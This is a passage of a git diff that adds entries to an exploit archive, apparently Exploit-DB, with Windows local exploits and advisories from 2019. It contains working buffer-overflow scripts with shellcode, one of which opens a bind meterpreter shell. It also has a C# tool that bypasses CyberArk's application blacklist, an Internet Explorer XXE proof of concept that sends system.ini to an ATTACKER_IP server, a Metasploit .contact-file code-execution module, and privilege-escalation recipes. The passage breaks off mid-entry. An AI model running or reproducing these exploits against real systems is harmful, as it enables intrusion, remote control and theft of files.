+"\x4c\x33\x36\x33\x4c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x33\x45"
+"\x33\x35\x4f\x4b\x30\x47\x54\x53\x32\x52\x42\x4f\x32\x4a\x43"
+"\x30\x56\x33\x4b\x4f\x38\x55\x32\x43\x55\x31\x42\x4c\x53\x53"
+"\x46\x4e\x52\x45\x33\x48\x52\x45\x33\x30\x41\x41")
+buffer = junk + nseh + seh + jmp + shellcode
+buffer += "C" * (5000-len(buffer))
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46673.py b/exploits/windows/local/46673.py
new file mode 100755
index 000000000..5509d91d9
--- /dev/null
+++ b/exploits/windows/local/46673.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python                                                                                         #
+# Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow                             #
+# Date: 2019-04-05                                                                                        #
+# Vendor Homepage: http://www.speedbit.com/dap/                                                           #
+# Software Link: http://www.speedbit.com/dap/download/downloading.asp                                     #
+# Exploit Author: Peyman Forouzan                                                                         #
+# Tested Version: 10.0.6.0                                                                                #
+# Tested on: Win10 Enterprise 64 bit                                                                      #
+# Note : In other versions of Windows, it will cause the program to Crash                                 #
+# Special Thanks to my wife                                                                               #
+# Steps :                                                                                                 #
+#  1- Run python code : Dap.py ( Dap.txt is created )                                                     #
+#  2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into      #
+#     Import Web Page --> Ok --> Shellcode (Calc) open                                                    #
+#---------------------------------------------------------------------------------------------------------#
+
+junk = "\x41" * 4091
+
+nseh = "\x61\x62"
+seh  = "\x57\x42"			# Overwrite Seh # 0x00420057 : {pivot 8}
+
+prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
+prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
+prepare += "\x41" * 107;
+
+# calc unicode shell - can be replaced with shellcode
+calc =  "PPYAIAIAIAIAQATAXAZAPA3QADAZA"
+calc += "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
+calc += "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
+calc += "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
+calc += "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
+calc += "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
+calc += "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
+calc += "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
+calc += "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
+calc += "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
+calc += "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
+calc += "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
+calc += "QQ2LRCM0LJA";
+
+buffer = "http://" + junk + nseh + seh + prepare + calc
+print "[+] Creating %s bytes payload ..." %len(buffer)
+f = open ("Dap.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46683.txt b/exploits/windows/local/46683.txt
new file mode 100644
index 000000000..08d7967dd
--- /dev/null
+++ b/exploits/windows/local/46683.txt
@@ -0,0 +1,9 @@
+This vulnerability allows low privileged users to hijack file that are owned by NT AUTHORITY\SYSTEM by overwriting permissions on the targeted file. Successful exploitation results in "Full Control" permissions for the low privileged user. 
+
+1. The exploit first checks if the targeted file exists, if it does it will check its permissions. Since we are using Microsoft Edge for this exploit it will kill Microsoft Edge in order to get access to the settings.dat file. 
+2. After Microsoft Edge is killed it will check for the "setting.dat" file and delete it in order to create a hardlink to the requested targeted file (in our case that was the HOSTS file) 
+3. Once a hardlink is created Microsoft Edge is fired up again to trigger the vulnerability. Concluding with a final check if indeed "Full Control" permissions have been set for the current user.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46683.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46685.py b/exploits/windows/local/46685.py
new file mode 100755
index 000000000..aba3e9069
--- /dev/null
+++ b/exploits/windows/local/46685.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+# Exploit Title: FTP Shell Server 6.83 'Account name to ban' Buffer Overflow
+# Date: 09-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.ftpshell.com/index.htm
+# Version: 6.83
+# Software Link : http://www.ftpshell.com/downloadserver.htm
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# Initial DOS discovery by: Victor Mondragón
+# Created during 2019 intern training
+# Greetz Amy, Delicia, Greg, Tonderai, Nzanoa & Telspace Systems Crew
+# PoC:
+# 1.) Generate ftpshell.txt, copy the contents to clipboard
+# 2.) In the application, open 'Manage FTP Accounts' -> "Add Account Name"
+# 3.) Paste the contents of ftpshell.txt in "Account name to ban"
+# 4.) Click "OK" and calc pops
+#JMP ESP - 0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+
+
+#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a\x7d" -f c
+shellcode = ("\xdd\xc7\xb8\xa0\x9e\x31\x11\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x31\x31\x42\x18\x03\x42\x18\x83\xc2\xa4\x7c\xc4\xed\x4c\x02"
+"\x27\x0e\x8c\x63\xa1\xeb\xbd\xa3\xd5\x78\xed\x13\x9d\x2d\x01"
+"\xdf\xf3\xc5\x92\xad\xdb\xea\x13\x1b\x3a\xc4\xa4\x30\x7e\x47"
+"\x26\x4b\x53\xa7\x17\x84\xa6\xa6\x50\xf9\x4b\xfa\x09\x75\xf9"
+"\xeb\x3e\xc3\xc2\x80\x0c\xc5\x42\x74\xc4\xe4\x63\x2b\x5f\xbf"
+"\xa3\xcd\x8c\xcb\xed\xd5\xd1\xf6\xa4\x6e\x21\x8c\x36\xa7\x78"
+"\x6d\x94\x86\xb5\x9c\xe4\xcf\x71\x7f\x93\x39\x82\x02\xa4\xfd"
+"\xf9\xd8\x21\xe6\x59\xaa\x92\xc2\x58\x7f\x44\x80\x56\x34\x02"
+"\xce\x7a\xcb\xc7\x64\x86\x40\xe6\xaa\x0f\x12\xcd\x6e\x54\xc0"
+"\x6c\x36\x30\xa7\x91\x28\x9b\x18\x34\x22\x31\x4c\x45\x69\x5f"
+"\x93\xdb\x17\x2d\x93\xe3\x17\x01\xfc\xd2\x9c\xce\x7b\xeb\x76"
+"\xab\x74\xa1\xdb\x9d\x1c\x6c\x8e\x9c\x40\x8f\x64\xe2\x7c\x0c"
+"\x8d\x9a\x7a\x0c\xe4\x9f\xc7\x8a\x14\xed\x58\x7f\x1b\x42\x58"
+"\xaa\x78\x05\xca\x36\x51\xa0\x6a\xdc\xad")
+
+buffer = "A" * 416 + "\x3b\x69\x5a\x77" + "\x90" * 20 + shellcode + "C" * 80
+
+payload = buffer
+try:
+    f=open("ftpshell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46686.py b/exploits/windows/local/46686.py
new file mode 100755
index 000000000..f48a4c62b
--- /dev/null
+++ b/exploits/windows/local/46686.py
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+# Exploit Title: FTP Shell Server 6.83 'Virtual Path Mapping' Buffer Overflow
+# Date: 09-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.ftpshell.com/index.htm
+# Version: 6.83
+# Software Link : http://www.ftpshell.com/downloadserver.htm
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# Created during 2019 Intern Training
+# Greetz Amy, Delicia, Greg, Tonderai, Nzanoa & Telspace Systems Crew
+# PoC:
+# 1.) Generate ftpshell.txt, copy the contents to clipboard
+# 2.) In the application, open 'Manage FTP Accounts' -> "Configure Accounts" -> "Add Path"
+# 3.) Paste the contents of ftpshell.txt in "Virtual Path Mapping"
+# 4.) Click "OK" and you'll have a bind meterpreter shell on port 443
+#7E429353   FFE4             JMP ESP
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\xda\xc3\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
+"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c"
+"\x4a\x48\x6e\x62\x33\x30\x43\x30\x73\x30\x43\x50\x4f\x79\x6a"
+"\x45\x70\x31\x59\x50\x42\x44\x6e\x6b\x66\x30\x50\x30\x4c\x4b"
+"\x53\x62\x44\x4c\x4c\x4b\x31\x42\x64\x54\x4c\x4b\x54\x32\x35"
+"\x78\x34\x4f\x4d\x67\x43\x7a\x77\x56\x50\x31\x39\x6f\x6c\x6c"
+"\x47\x4c\x30\x61\x31\x6c\x76\x62\x36\x4c\x61\x30\x79\x51\x7a"
+"\x6f\x76\x6d\x77\x71\x59\x57\x4a\x42\x5a\x52\x32\x72\x76\x37"
+"\x6c\x4b\x46\x32\x34\x50\x6e\x6b\x30\x4a\x45\x6c\x4c\x4b\x30"
+"\x4c\x36\x71\x74\x38\x39\x73\x30\x48\x73\x31\x58\x51\x46\x31"
+"\x4c\x4b\x53\x69\x37\x50\x56\x61\x6b\x63\x6e\x6b\x32\x69\x42"
+"\x38\x68\x63\x65\x6a\x70\x49\x6e\x6b\x57\x44\x6e\x6b\x63\x31"
+"\x7a\x76\x54\x71\x6b\x4f\x4e\x4c\x4f\x31\x58\x4f\x34\x4d\x76"
+"\x61\x4f\x37\x45\x68\x4d\x30\x64\x35\x68\x76\x44\x43\x71\x6d"
+"\x7a\x58\x45\x6b\x53\x4d\x67\x54\x44\x35\x6a\x44\x32\x78\x6c"
+"\x4b\x50\x58\x37\x54\x63\x31\x6b\x63\x75\x36\x4e\x6b\x34\x4c"
+"\x70\x4b\x4e\x6b\x62\x78\x45\x4c\x35\x51\x69\x43\x6c\x4b\x76"
+"\x64\x6c\x4b\x66\x61\x68\x50\x4e\x69\x73\x74\x55\x74\x61\x34"
+"\x51\x4b\x33\x6b\x61\x71\x76\x39\x30\x5a\x36\x31\x6b\x4f\x6b"
+"\x50\x71\x4f\x51\x4f\x71\x4a\x4e\x6b\x65\x42\x38\x6b\x6c\x4d"
+"\x31\x4d\x70\x68\x75\x63\x70\x32\x63\x30\x47\x70\x42\x48\x54"
+"\x37\x53\x43\x76\x52\x71\x4f\x50\x54\x63\x58\x32\x6c\x34\x37"
+"\x77\x56\x54\x47\x49\x6f\x4e\x35\x68\x38\x7a\x30\x47\x71\x43"
+"\x30\x43\x30\x57\x59\x4a\x64\x46\x34\x56\x30\x35\x38\x74\x69"
+"\x4d\x50\x50\x6b\x57\x70\x39\x6f\x68\x55\x51\x7a\x54\x4b\x32"
+"\x79\x30\x50\x6d\x32\x4b\x4d\x72\x4a\x33\x31\x71\x7a\x43\x32"
+"\x72\x48\x58\x6a\x44\x4f\x79\x4f\x79\x70\x79\x6f\x5a\x75\x6c"
+"\x57\x55\x38\x73\x32\x67\x70\x63\x31\x4d\x6b\x6f\x79\x49\x76"
+"\x62\x4a\x62\x30\x61\x46\x42\x77\x75\x38\x6a\x62\x39\x4b\x45"
+"\x67\x35\x37\x79\x6f\x78\x55\x6e\x65\x39\x50\x62\x55\x71\x48"
+"\x31\x47\x55\x38\x4e\x57\x79\x79\x65\x68\x79\x6f\x49\x6f\x78"
+"\x55\x32\x77\x51\x78\x32\x54\x48\x6c\x75\x6b\x68\x61\x49\x6f"
+"\x38\x55\x51\x47\x6f\x67\x45\x38\x53\x45\x62\x4e\x50\x4d\x55"
+"\x31\x79\x6f\x39\x45\x72\x4a\x53\x30\x30\x6a\x33\x34\x52\x76"
+"\x36\x37\x73\x58\x64\x42\x48\x59\x69\x58\x53\x6f\x49\x6f\x38"
+"\x55\x4c\x43\x38\x78\x53\x30\x51\x6e\x76\x4d\x6e\x6b\x57\x46"
+"\x72\x4a\x51\x50\x61\x78\x67\x70\x36\x70\x75\x50\x33\x30\x30"
+"\x56\x31\x7a\x53\x30\x33\x58\x43\x68\x49\x34\x30\x53\x69\x75"
+"\x59\x6f\x6a\x75\x4a\x33\x46\x33\x43\x5a\x43\x30\x70\x56\x63"
+"\x63\x63\x67\x62\x48\x77\x72\x58\x59\x39\x58\x53\x6f\x4b\x4f"
+"\x49\x45\x4d\x53\x7a\x58\x55\x50\x43\x4e\x66\x67\x56\x61\x4b"
+"\x73\x46\x49\x69\x56\x74\x35\x6d\x39\x79\x53\x4d\x6b\x58\x70"
+"\x4d\x65\x6e\x42\x32\x76\x71\x7a\x65\x50\x56\x33\x69\x6f\x48"
+"\x55\x41\x41")
+
+buffer = "A" * 395 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode + "C" * 211
+
+payload = buffer
+try:
+    f=open("ftpshell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46688.txt b/exploits/windows/local/46688.txt
new file mode 100644
index 000000000..69b0cafc6
--- /dev/null
+++ b/exploits/windows/local/46688.txt
@@ -0,0 +1,72 @@
+# Exploit Title: CyberArk Endpoint bypass 
+# Google Dork: -
+# Date: 03/06/2018
+# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
+# Vendor Homepage: https://www.cyberark.com
+# Software Link: -
+# Version: 10.2.1.603
+# Tested on: Windows 10
+# CVE : CVE-2018-14894
+
+//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
+//This product also has a function called “Application Blacklist”. You probably know what that means.
+//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
+//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
+//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute
+
+This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Linq;
+using System.Text;
+using System.Windows.Forms;
+using System;
+using System.IO;
+using System.Security.AccessControl;
+
+namespace raceagainstthesystem
+{
+    public partial class Form1 : Form
+    {
+        public Form1()
+        {
+            InitializeComponent();
+        }
+
+        private void btn_change_access_control_Click(object sender, EventArgs e)
+        {
+            string fileName = txt_filepath.Text;
+            FileSecurity fSecurity = File.GetAccessControl(fileName);
+            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
+                    FileSystemRights.ReadData, AccessControlType.Deny));
+            File.SetAccessControl(fileName, fSecurity);
+
+            /*
+            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
+                    FileSystemRights.ReadData, AccessControlType.Allow));
+            */
+
+            File.SetAccessControl(fileName, fSecurity);
+        }
+
+        private void btn_choseFile_Click(object sender, System.EventArgs e)
+        {
+            OpenFileDialog choofdlog = new OpenFileDialog();
+            choofdlog.Filter = "All Files (*.*)|*.*";
+            choofdlog.FilterIndex = 1;
+            choofdlog.Multiselect = true;
+
+            string sFileName = "";
+
+            if (choofdlog.ShowDialog() == DialogResult.OK)
+            {
+                sFileName = choofdlog.FileName;
+                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true           
+            }
+            txt_filepath.Text = sFileName;
+        }
+    }
+}
\ No newline at end of file
diff --git a/exploits/windows/local/46690.txt b/exploits/windows/local/46690.txt
new file mode 100644
index 000000000..8597786c9
--- /dev/null
+++ b/exploits/windows/local/46690.txt
@@ -0,0 +1,183 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Internet Explorer v11
+(latest version)
+
+Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
+
+
+[Vulnerability Type]
+XML External Entity Injection
+
+
+
+[CVE Reference]
+N/A
+
+
+
+[Security Issue]
+Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally.
+
+This can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed
+Program version information. Example, a request for "c:\Python27\NEWS.txt" can return version information for that program.
+
+Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
+and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability.
+
+However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage.
+Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised.
+
+Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted
+to activate blocked content. However, when opening a specially crafted .MHT file using malicious <xml> markup tags the user will get no such
+active content or security bar warnings.
+
+e.g.
+
+C:\sec>python -m SimpleHTTPServer
+Serving HTTP on 0.0.0.0 port 8000 ...
+127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
+127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -
+
+
+Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2.
+
+
+
+[POC/Video URL]
+https://www.youtube.com/watch?v=fbLNbCjgJeY
+
+
+
+[Exploit/POC]
+POC to exfil  Windows "system.ini" file.
+Note: Edit attacker server IP in the script to suit your needs.
+
+1) Use below script to create the "datatears.xml" XML and XXE embedded "msie-xxe-0day.mht" MHT file.
+
+2) python -m SimpleHTTPServer
+
+3) Place the generated "datatears.xml" in Python server web-root.
+
+4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.
+
+
+#Microsoft Internet Explorer XXE 0day
+#Creates malicious XXE .MHT and XML files
+#Open the MHT file in MSIE locally, should exfil system.ini
+#By hyp3rlinx 
+#ApparitionSec
+
+ATTACKER_IP="localhost"
+PORT="8000"
+
+mht_file=(
+'From:\n'
+'Subject:\n'
+'Date:\n'
+'MIME-Version: 1.0\n'
+'Content-Type: multipart/related; type="text/html";\n'
+'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
+'This is a multi-part message in MIME format.\n\n\n'
+
+'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
+'Content-Type: text/html; charset="UTF-8"\n'
+'Content-Location: main.htm\n\n'
+
+'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">\n'
+'<html>\n'
+'<head>\n'
+'<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
+'<title>MSIE XXE 0day</title>\n'
+'</head>\n'
+'<body>\n'
+'<xml>\n'
+'<?xml version="1.0" encoding="utf-8"?>\n'
+'<!DOCTYPE r [\n'
+'<!ELEMENT r ANY >\n'
+'<!ENTITY % sp SYSTEM "http://'+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
+'%sp;\n'
+'%param1;\n'
+']>\n'
+'<r>&exfil;</r>\n'
+'<r>&exfil;</r>\n'
+'<r>&exfil;</r>\n'
+'<r>&exfil;</r>\n'
+'</xml>\n'
+'<script>window.print();</script>\n'
+'<table cellpadding="0" cellspacing="0" border="0">\n'
+'<tr>\n'
+'<td class="contentcell-width">\n'
+'<h1>MSIE XML External Entity 0day PoC.</h1>\n'
+'<h3>Discovery: hyp3rlinx</h3>\n'
+'<h3>ApparitionSec</h3>\n'
+'</td>\n'
+'</tr>\n'
+'</table>\n'
+'</body>\n'
+'</html>\n\n\n'
+
+'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
+)
+
+xml_file=(
+'<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
+'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
+'<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
+'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
+)
+
+def mk_msie_0day_filez(f,p):
+    f=open(f,"wb")
+    f.write(p)
+    f.close()
+
+
+if __name__ == "__main__":
+    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
+    mk_msie_0day_filez("datatears.xml",xml_file)
+    print "Microsoft Internet Explorer XML External Entity 0day PoC."
+    print "Files msie-xxe-0day.mht and datatears.xml Created!."
+    print "Discovery: Hyp3rlinx / Apparition Security"
+
+    
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+
+[Disclosure Timeline]
+Vendor Notification: March 27, 2019
+Vendor acknowledgement: March 27, 2019 
+Case Opened: March 28, 2019
+MSRC reponse April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service.
+At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
+April 10, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/46692.rb b/exploits/windows/local/46692.rb
new file mode 100755
index 000000000..b600b59ab
--- /dev/null
+++ b/exploits/windows/local/46692.rb
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'fileutils'
+require 'rex/zip'
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Microsoft Windows Contact File Format Arbitary Code Execution',
+      'Description' => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
+        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
+        Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
+        Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
+        The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
+        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
+      },
+      'Author'      =>
+        [ 'John Page (aka hyp3rlinx)', # Vuln discovery
+          'Brenner Little' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['EDB', '46188'],
+          ['URL', 'http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt'],
+          ['ZDI', '19-013']
+        ],
+      'DisclosureDate' => 'Jan 17 2019', # According to https://www.exploit-db.com/exploits/46188
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Payload'        => {
+        'DisableNops' => true
+      },
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true
+      },
+      'Targets'        => [['Windows', { }]],
+      'DefaultTarget'  => 0
+      ))
+      register_options(
+      [
+        OptString.new('WEBSITE', [true, 'The URL that the user must click to launch the payload.', 'www.metasploit.com']),
+        OptString.new('FILENAME', [true, 'The first and last name embdeed in the .CONTACT file (also used as the filename for the .CONTACT and .ZIP files)', 'John Smith']),
+      ])
+  end
+  def exploit
+    contact_full_name = "#{datastore['FILENAME']}"
+    exe_filename = "#{datastore['WEBSITE']}"
+
+    xml_header = %Q|<?xml version="1.0" encoding="UTF-8"?>
+\t<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P">
+\t<c:CreationDate>2019-04-10T20:19:26Z</c:CreationDate><c:Extended xsi:nil="true"/>
+\t|
+
+    xml_body = %Q|
+        <c:ContactIDCollection>
+          <c:ContactID c:ElementID="492912d2-db87-4da2-9fb0-1a3533284d09"><c:Value>e3b2d76c-3355-4f54-b995-0ce0dcf84c8a</c:Value></c:ContactID>
+        </c:ContactIDCollection>
+        <c:NameCollection>
+          <c:Name c:ElementID="9c47b169-4385-40e9-97cf-cc2f55544c8d">
+            <c:FormattedName>CONTACT_FULL_NAME</c:FormattedName>
+            <c:FamilyName>CONTACT_LAST_NAME</c:FamilyName>
+            <c:GivenName>CONTACT_FIRST_NAME</c:GivenName>
+          </c:Name>
+        </c:NameCollection>
+        <c:PhotoCollection>
+          <c:Photo c:ElementID="9b2b24b3-2ce5-4553-abe1-8cb0cf7ad12e">
+            <c:LabelCollection>
+              <c:Label>UserTile</c:Label>
+            </c:LabelCollection>
+          </c:Photo>
+        </c:PhotoCollection>
+        <c:UrlCollection c:Version="1" c:ModificationDate="2019-04-10T21:15:00Z">
+          <c:Url c:ElementID="4aca9a0f-72fd-45ff-8683-1524caafd6e9" c:Version="1" c:ModificationDate="2019-04-10T21:15:00Z">
+            <c:Value c:Version="1" c:ModificationDate="2019-04-10T21:15:00Z">EXE_PATH</c:Value>
+            <c:LabelCollection>
+              <c:Label c:Version="1" c:ModificationDate="2019-04-10T21:15:00Z">Business</c:Label>
+            </c:LabelCollection>
+          </c:Url>
+        </c:UrlCollection>
+      </c:contact>|.gsub(/\n[ ]*/,'')
+
+    xml = xml_header + xml_body
+    xml.gsub!(/CONTACT_FULL_NAME/, contact_full_name);
+    xml.gsub!(/CONTACT_LAST_NAME/, contact_full_name.split(' ')[-1]);
+    xml.gsub!(/CONTACT_FIRST_NAME/, contact_full_name.split(' ')[0]);
+    xml.gsub!(/EXE_PATH/, "http.\\" + exe_filename);
+
+    exe = generate_payload_exe
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("/http/" + exe_filename, exe)
+    zip.add_file(contact_full_name + ".contact", xml)
+    zip.save_to(contact_full_name + ".zip")
+    print_good("Created '#{contact_full_name}.zip'")
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/46707.txt b/exploits/windows/local/46707.txt
new file mode 100644
index 000000000..e65fd79a3
--- /dev/null
+++ b/exploits/windows/local/46707.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) Privilege Escalation
+# Date: 15th April 2019
+# Exploit Author: Digital Interruption
+# Vendor Homepage: https://www.manageengine.co.uk/
+# Version: 6.6 (Build 6658)
+# Tested on: Windows Server 2012 R2
+# CVE : CVE-2018-19374
+
+Due to weak permissions setup on the bin, lib and tools directories within the ManageEngine installation directory, it is possible for any authenticated user to modify several core files.
+
+To escalate privileges to that of LOCAL SYSTEM, drop a payload onto the system and then add a line to bin\ChangeJRE.bat to execute it every time the system is rebooted.
\ No newline at end of file
diff --git a/exploits/windows/local/46712.txt b/exploits/windows/local/46712.txt
new file mode 100644
index 000000000..f0fe58f27
--- /dev/null
+++ b/exploits/windows/local/46712.txt
@@ -0,0 +1,50 @@
+Windows: CSRSS SxSSrv Cached Manifest EoP
+Platform: Windows 10 1809, 1709
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary (and others)
+
+Summary:
+The SxS manifest cache in CSRSS uses a weak key allowing an attacker to fill a cache entry for a system binary leading to EoP.
+
+Description:
